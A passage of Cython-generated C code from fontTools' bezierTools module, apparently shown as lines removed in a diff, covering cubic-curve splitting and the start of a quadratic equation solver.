__Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_6 = __pyx_PyFloat_AsDouble(__pyx_t_7); if (unlikely((__pyx_t_6 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 784, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_cur_scope->__pyx_v_t2 = __pyx_t_6; - - /* "fontTools/misc/bezierTools.py":785 - * t1 = ts[i] - * t2 = ts[i + 1] - * delta = t2 - t1 # <<<<<<<<<<<<<< - * - * delta_2 = delta * delta - */ - __pyx_cur_scope->__pyx_v_delta = (__pyx_cur_scope->__pyx_v_t2 - __pyx_cur_scope->__pyx_v_t1); - - /* "fontTools/misc/bezierTools.py":787 - * delta = t2 - t1 - * - * delta_2 = delta * delta # <<<<<<<<<<<<<< - * delta_3 = delta * delta_2 - * t1_2 = t1 * t1 - */ - __pyx_cur_scope->__pyx_v_delta_2 = (__pyx_cur_scope->__pyx_v_delta * __pyx_cur_scope->__pyx_v_delta); - - /* "fontTools/misc/bezierTools.py":788 - * - * delta_2 = delta * delta - * delta_3 = delta * delta_2 # <<<<<<<<<<<<<< - * t1_2 = t1 * t1 - * t1_3 = t1 * t1_2 - */ - __pyx_cur_scope->__pyx_v_delta_3 = (__pyx_cur_scope->__pyx_v_delta * __pyx_cur_scope->__pyx_v_delta_2); - - /* "fontTools/misc/bezierTools.py":789 - * delta_2 = delta * delta - * delta_3 = delta * delta_2 - * t1_2 = t1 * t1 # <<<<<<<<<<<<<< - * t1_3 = t1 * t1_2 - * - */ - __pyx_cur_scope->__pyx_v_t1_2 = (__pyx_cur_scope->__pyx_v_t1 * __pyx_cur_scope->__pyx_v_t1); - - /* "fontTools/misc/bezierTools.py":790 - * delta_3 = delta * delta_2 - * t1_2 = t1 * t1 - * t1_3 = t1 * t1_2 # <<<<<<<<<<<<<< - * - * # calc new a, b, c and d - */ - __pyx_cur_scope->__pyx_v_t1_3 = (__pyx_cur_scope->__pyx_v_t1 * __pyx_cur_scope->__pyx_v_t1_2); - - /* "fontTools/misc/bezierTools.py":793 - * - * # calc new a, b, c and d - * a1 = a * delta_3 # <<<<<<<<<<<<<< - * b1 = (3 * a * t1 + b) * delta_2 - * c1 = (2 * b * t1 + c + 3 * a * t1_2) * delta - */ - __pyx_cur_scope->__pyx_v_a1 = __Pyx_c_prod_double(__pyx_cur_scope->__pyx_v_a, __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_delta_3, 0)); - - /* 
"fontTools/misc/bezierTools.py":794 - * # calc new a, b, c and d - * a1 = a * delta_3 - * b1 = (3 * a * t1 + b) * delta_2 # <<<<<<<<<<<<<< - * c1 = (2 * b * t1 + c + 3 * a * t1_2) * delta - * d1 = a * t1_3 + b * t1_2 + c * t1 + d - */ - __pyx_cur_scope->__pyx_v_b1 = __Pyx_c_prod_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(3, 0), __pyx_cur_scope->__pyx_v_a), __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_t1, 0)), __pyx_cur_scope->__pyx_v_b), __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_delta_2, 0)); - - /* "fontTools/misc/bezierTools.py":795 - * a1 = a * delta_3 - * b1 = (3 * a * t1 + b) * delta_2 - * c1 = (2 * b * t1 + c + 3 * a * t1_2) * delta # <<<<<<<<<<<<<< - * d1 = a * t1_3 + b * t1_2 + c * t1 + d - * pt1, pt2, pt3, pt4 = calcCubicPointsC(a1, b1, c1, d1) - */ - __pyx_cur_scope->__pyx_v_c1 = __Pyx_c_prod_double(__Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(2, 0), __pyx_cur_scope->__pyx_v_b), __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_t1, 0)), __pyx_cur_scope->__pyx_v_c), __Pyx_c_prod_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(3, 0), __pyx_cur_scope->__pyx_v_a), __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_t1_2, 0))), __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_delta, 0)); - - /* "fontTools/misc/bezierTools.py":796 - * b1 = (3 * a * t1 + b) * delta_2 - * c1 = (2 * b * t1 + c + 3 * a * t1_2) * delta - * d1 = a * t1_3 + b * t1_2 + c * t1 + d # <<<<<<<<<<<<<< - * pt1, pt2, pt3, pt4 = calcCubicPointsC(a1, b1, c1, d1) - * yield (pt1, pt2, pt3, pt4) - */ - __pyx_cur_scope->__pyx_v_d1 = __Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_cur_scope->__pyx_v_a, __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_t1_3, 0)), __Pyx_c_prod_double(__pyx_cur_scope->__pyx_v_b, 
__pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_t1_2, 0))), __Pyx_c_prod_double(__pyx_cur_scope->__pyx_v_c, __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_t1, 0))), __pyx_cur_scope->__pyx_v_d); - - /* "fontTools/misc/bezierTools.py":797 - * c1 = (2 * b * t1 + c + 3 * a * t1_2) * delta - * d1 = a * t1_3 + b * t1_2 + c * t1 + d - * pt1, pt2, pt3, pt4 = calcCubicPointsC(a1, b1, c1, d1) # <<<<<<<<<<<<<< - * yield (pt1, pt2, pt3, pt4) - * - */ - __pyx_t_7 = __pyx_f_9fontTools_4misc_11bezierTools_calcCubicPointsC(__pyx_cur_scope->__pyx_v_a1, __pyx_cur_scope->__pyx_v_b1, __pyx_cur_scope->__pyx_v_c1, __pyx_cur_scope->__pyx_v_d1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 797, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - if ((likely(PyTuple_CheckExact(__pyx_t_7))) || (PyList_CheckExact(__pyx_t_7))) { - PyObject* sequence = __pyx_t_7; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 4)) { - if (size > 4) __Pyx_RaiseTooManyValuesError(4); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 797, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_8 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_9 = PyTuple_GET_ITEM(sequence, 2); - __pyx_t_10 = PyTuple_GET_ITEM(sequence, 3); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_8 = PyList_GET_ITEM(sequence, 1); - __pyx_t_9 = PyList_GET_ITEM(sequence, 2); - __pyx_t_10 = PyList_GET_ITEM(sequence, 3); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_8); - __Pyx_INCREF(__pyx_t_9); - __Pyx_INCREF(__pyx_t_10); - #else - { - Py_ssize_t i; - PyObject** temps[4] = {&__pyx_t_1,&__pyx_t_8,&__pyx_t_9,&__pyx_t_10}; - for (i=0; i < 4; i++) { - PyObject* item = PySequence_ITEM(sequence, i); if (unlikely(!item)) __PYX_ERR(0, 797, __pyx_L1_error) - __Pyx_GOTREF(item); - *(temps[i]) = item; - } - } - #endif - __Pyx_DECREF(__pyx_t_7); 
__pyx_t_7 = 0; - } else { - Py_ssize_t index = -1; - PyObject** temps[4] = {&__pyx_t_1,&__pyx_t_8,&__pyx_t_9,&__pyx_t_10}; - __pyx_t_11 = PyObject_GetIter(__pyx_t_7); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 797, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_11); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_12 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_11); - for (index=0; index < 4; index++) { - PyObject* item = __pyx_t_12(__pyx_t_11); if (unlikely(!item)) goto __pyx_L6_unpacking_failed; - __Pyx_GOTREF(item); - *(temps[index]) = item; - } - if (__Pyx_IternextUnpackEndCheck(__pyx_t_12(__pyx_t_11), 4) < 0) __PYX_ERR(0, 797, __pyx_L1_error) - __pyx_t_12 = NULL; - __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; - goto __pyx_L7_unpacking_done; - __pyx_L6_unpacking_failed:; - __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; - __pyx_t_12 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 797, __pyx_L1_error) - __pyx_L7_unpacking_done:; - } - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_pt1); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_pt1, __pyx_t_1); - __Pyx_GIVEREF(__pyx_t_1); - __pyx_t_1 = 0; - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_pt2); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_pt2, __pyx_t_8); - __Pyx_GIVEREF(__pyx_t_8); - __pyx_t_8 = 0; - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_pt3); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_pt3, __pyx_t_9); - __Pyx_GIVEREF(__pyx_t_9); - __pyx_t_9 = 0; - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_pt4); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_pt4, __pyx_t_10); - __Pyx_GIVEREF(__pyx_t_10); - __pyx_t_10 = 0; - - /* "fontTools/misc/bezierTools.py":798 - * d1 = a * t1_3 + b * t1_2 + c * t1 + d - * pt1, pt2, pt3, pt4 = calcCubicPointsC(a1, b1, c1, d1) - * yield (pt1, pt2, pt3, pt4) # <<<<<<<<<<<<<< - * - * - */ - __pyx_t_7 = PyTuple_New(4); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 798, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_pt1); - 
__Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_7, 0, __pyx_cur_scope->__pyx_v_pt1)) __PYX_ERR(0, 798, __pyx_L1_error); - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_pt2); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_7, 1, __pyx_cur_scope->__pyx_v_pt2)) __PYX_ERR(0, 798, __pyx_L1_error); - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_pt3); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_pt3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_7, 2, __pyx_cur_scope->__pyx_v_pt3)) __PYX_ERR(0, 798, __pyx_L1_error); - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_pt4); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_pt4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_7, 3, __pyx_cur_scope->__pyx_v_pt4)) __PYX_ERR(0, 798, __pyx_L1_error); - __pyx_r = __pyx_t_7; - __pyx_t_7 = 0; - __Pyx_XGIVEREF(__pyx_t_2); - __pyx_cur_scope->__pyx_t_0 = __pyx_t_2; - __pyx_cur_scope->__pyx_t_1 = __pyx_t_4; - __pyx_cur_scope->__pyx_t_2 = __pyx_t_5; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - /* return from generator, yielding value */ - __pyx_generator->resume_label = 1; - return __pyx_r; - __pyx_L8_resume_from_yield:; - __pyx_t_2 = __pyx_cur_scope->__pyx_t_0; - __pyx_cur_scope->__pyx_t_0 = 0; - __Pyx_XGOTREF(__pyx_t_2); - __pyx_t_4 = __pyx_cur_scope->__pyx_t_1; - __pyx_t_5 = __pyx_cur_scope->__pyx_t_2; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 798, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":782 - * ts.insert(0, 0.0) - * ts.append(1.0) - * for i in range(len(ts) - 1): # <<<<<<<<<<<<<< - * t1 = ts[i] - * t2 = ts[i + 1] - */ - } - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - CYTHON_MAYBE_UNUSED_VAR(__pyx_cur_scope); - - /* "fontTools/misc/bezierTools.py":763 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * a=cython.complex, - * b=cython.complex, - */ - - /* function exit code */ - PyErr_SetNone(PyExc_StopIteration); - goto __pyx_L0; - __pyx_L1_error:; - 
__Pyx_Generator_Replace_StopIteration(0); - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_XDECREF(__pyx_t_11); - __Pyx_AddTraceback("_splitCubicAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_L0:; - __Pyx_XDECREF(__pyx_r); __pyx_r = 0; - #if !CYTHON_USE_EXC_INFO_STACK - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - #endif - __pyx_generator->resume_label = -1; - __Pyx_Coroutine_clear((PyObject*)__pyx_generator); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":808 - * - * - * def solveQuadratic(a, b, c, sqrt=sqrt): # <<<<<<<<<<<<<< - * """Solve a quadratic equation. - * - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_94__defaults__(CYTHON_UNUSED PyObject *__pyx_self) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("__defaults__", 1); - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 808, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__Pyx_CyFunction_Defaults(__pyx_defaults, __pyx_self)->__pyx_arg_sqrt); - __Pyx_GIVEREF(__Pyx_CyFunction_Defaults(__pyx_defaults, __pyx_self)->__pyx_arg_sqrt); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __Pyx_CyFunction_Defaults(__pyx_defaults, __pyx_self)->__pyx_arg_sqrt)) __PYX_ERR(0, 808, __pyx_L1_error); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 808, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_t_1)) __PYX_ERR(0, 808, __pyx_L1_error); - __Pyx_INCREF(Py_None); - __Pyx_GIVEREF(Py_None); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, Py_None)) __PYX_ERR(0, 808, __pyx_L1_error); - __pyx_t_1 = 
0; - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_AddTraceback("fontTools.misc.bezierTools.__defaults__", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_47solveQuadratic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_46solveQuadratic, "solveQuadratic(a, b, c, sqrt=sqrt)\nSolve a quadratic equation.\n\n Solves *a*x*x + b*x + c = 0* where a, b and c are real.\n\n Args:\n a: coefficient of *x\302\262*\n b: coefficient of *x*\n c: constant term\n\n Returns:\n A list of roots. Note that the returned list is neither guaranteed to\n be sorted nor to contain unique values!\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_47solveQuadratic = {"solveQuadratic", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_47solveQuadratic, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_46solveQuadratic}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_47solveQuadratic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_a = 0; - PyObject *__pyx_v_b = 0; - PyObject *__pyx_v_c = 0; - PyObject *__pyx_v_sqrt = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = 
NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("solveQuadratic (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_c,&__pyx_n_s_sqrt,0}; - __pyx_defaults *__pyx_dynamic_args = __Pyx_CyFunction_Defaults(__pyx_defaults, __pyx_self); - values[3] = __Pyx_Arg_NewRef_FASTCALL(__pyx_dynamic_args->__pyx_arg_sqrt); - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 808, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 808, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("solveQuadratic", 0, 3, 4, 1); __PYX_ERR(0, 808, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, 
__pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 808, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("solveQuadratic", 0, 3, 4, 2); __PYX_ERR(0, 808, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (kw_args > 0) { - PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_sqrt); - if (value) { values[3] = __Pyx_Arg_NewRef_FASTCALL(value); kw_args--; } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 808, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "solveQuadratic") < 0)) __PYX_ERR(0, 808, __pyx_L3_error) - } - } else { - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - break; - default: goto __pyx_L5_argtuple_error; - } - } - __pyx_v_a = values[0]; - __pyx_v_b = values[1]; - __pyx_v_c = values[2]; - __pyx_v_sqrt = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("solveQuadratic", 0, 3, 4, __pyx_nargs); __PYX_ERR(0, 808, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.solveQuadratic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_46solveQuadratic(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_c, 
__pyx_v_sqrt); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_46solveQuadratic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_sqrt) { - PyObject *__pyx_v_roots = NULL; - PyObject *__pyx_v_DD = NULL; - PyObject *__pyx_v_rDD = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - int __pyx_t_5; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("solveQuadratic", 1); - - /* "fontTools/misc/bezierTools.py":822 - * be sorted nor to contain unique values! - * """ - * if abs(a) < epsilon: # <<<<<<<<<<<<<< - * if abs(b) < epsilon: - * # We have a non-equation; therefore, we have no valid solution - */ - __pyx_t_1 = __Pyx_PyNumber_Absolute(__pyx_v_a); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 822, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 822, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyObject_RichCompare(__pyx_t_1, __pyx_t_2, Py_LT); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 822, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 822, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":823 - * """ - * if abs(a) < epsilon: - * if abs(b) < epsilon: # <<<<<<<<<<<<<< - * # We have a non-equation; therefore, we have no 
valid solution - * roots = [] - */ - __pyx_t_3 = __Pyx_PyNumber_Absolute(__pyx_v_b); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 823, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 823, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyObject_RichCompare(__pyx_t_3, __pyx_t_2, Py_LT); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 823, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 823, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":825 - * if abs(b) < epsilon: - * # We have a non-equation; therefore, we have no valid solution - * roots = [] # <<<<<<<<<<<<<< - * else: - * # We have a linear equation with 1 root. - */ - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 825, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_roots = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":823 - * """ - * if abs(a) < epsilon: - * if abs(b) < epsilon: # <<<<<<<<<<<<<< - * # We have a non-equation; therefore, we have no valid solution - * roots = [] - */ - goto __pyx_L4; - } - - /* "fontTools/misc/bezierTools.py":828 - * else: - * # We have a linear equation with 1 root. - * roots = [-c / b] # <<<<<<<<<<<<<< - * else: - * # We have a true quadratic equation. Apply the quadratic formula to find two roots. 
- */ - /*else*/ { - __pyx_t_1 = PyNumber_Negative(__pyx_v_c); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 828, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyNumber_Divide(__pyx_t_1, __pyx_v_b); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 828, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyList_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 828, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_1, 0, __pyx_t_2)) __PYX_ERR(0, 828, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_v_roots = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - } - __pyx_L4:; - - /* "fontTools/misc/bezierTools.py":822 - * be sorted nor to contain unique values! - * """ - * if abs(a) < epsilon: # <<<<<<<<<<<<<< - * if abs(b) < epsilon: - * # We have a non-equation; therefore, we have no valid solution - */ - goto __pyx_L3; - } - - /* "fontTools/misc/bezierTools.py":831 - * else: - * # We have a true quadratic equation. Apply the quadratic formula to find two roots. - * DD = b * b - 4.0 * a * c # <<<<<<<<<<<<<< - * if DD >= 0.0: - * rDD = sqrt(DD) - */ - /*else*/ { - __pyx_t_1 = PyNumber_Multiply(__pyx_v_b, __pyx_v_b); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 831, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_float_4_0, __pyx_v_a); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 831, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_2, __pyx_v_c); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 831, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Subtract(__pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 